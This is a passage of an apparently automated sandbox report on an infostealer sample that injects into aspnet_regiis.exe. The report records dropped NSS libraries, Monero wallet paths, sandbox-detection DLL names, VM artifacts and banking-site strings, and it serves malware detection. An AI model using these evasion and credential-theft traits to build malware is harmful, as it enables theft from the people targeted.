                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: bcp47langs.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: slc.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: sppc.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ntvdm64.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: textshaping.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: textinputframework.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: coreuicomponents.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: coremessaging.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dui70.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: duser.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dwrite.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: windows.ui.immersive.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: bcp47mrm.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: uianimation.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dxgi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: resourcepolicyclient.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: d3d11.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: d3d10warp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dxcore.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dcomp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dwmapi.dll
                          Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                          Source: Window Recorder Window detected: More than 3 window changes detected
                          Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                          Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.3394302971.000000003A330000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.3389107122.000000002E456000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                          Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

                          Data Obfuscation

                          Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.a90000.0.unpack n@G>6P:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: file.exe Static PE information: section name: n@G>6P
                          Source: file.exe Static PE information: section name:
                          Source: freebl3.dll.3.dr Static PE information: section name: .00cfg
                          Source: mozglue.dll.3.dr Static PE information: section name: .00cfg
                          Source: msvcp140.dll.3.dr Static PE information: section name: .didat
                          Source: softokn3.dll.3.dr Static PE information: section name: .00cfg
                          Source: nss3.dll.3.dr Static PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AE36D2 push esp; retf 0_2_00AE36D3
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AE6827 push cs; retf 0_2_00AE6828
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6E818C21 push ecx; ret 0_2_6E818C34
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0042F142 push ecx; ret 3_2_0042F155
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00422D3B push esi; ret 3_2_00422D3D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0041DDB5 push ecx; ret 3_2_0041DDC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00432715 push 0000004Ch; iretd 3_2_00432726
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6C7CB536 push ecx; ret 3_2_6C7CB549
                          Source: file.exe Static PE information: section name: n@G>6P entropy: 7.9994507847955285
                          Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\msvcp110.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\mozglue.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\nss3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\msvcp140.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\freebl3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\vcruntime140.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\ProgramData\softokn3.dll
                          Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: Yara match File source: 0.2.file.exe.6e820000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.file.exe.6e820000.6.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 3.2.aspnet_regiis.exe.400000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 3.2.aspnet_regiis.exe.400000.1.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.file.exe.6e7f0000.4.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara match File source: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: file.exe PID: 2960, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 5576, type: MEMORYSTR
                          Source: aspnet_regiis.exe Binary or memory string: DIR_WATCH.DLL
                          Source: aspnet_regiis.exe Binary or memory string: SBIEDLL.DLL
                          Source: aspnet_regiis.exe Binary or memory string: API_LOG.DLL
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL21:49:5921:49:5921:49:5921:49:5921:49:5921:49:59DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: 15C0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: 3070000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: 2DC0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: 5640000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: 6640000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: 6770000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: 7770000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: 7AC0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: 8AC0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe Memory allocated: 9AC0000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_0040180D
                          Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Window / User API: threadDelayed 2221
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Window / User API: threadDelayed 857
                          Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe API coverage: 8.8 %
                          Source: C:\Users\user\Desktop\file.exe TID: 3048 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh 3_2_00410DDB
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6E8120ED FindFirstFileExW,0_2_6E8120ED
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,3_2_00410FBA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: Amcache.hve.3.dr Binary or memory string: VMware
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
                          Source: Amcache.hve.3.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                          Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
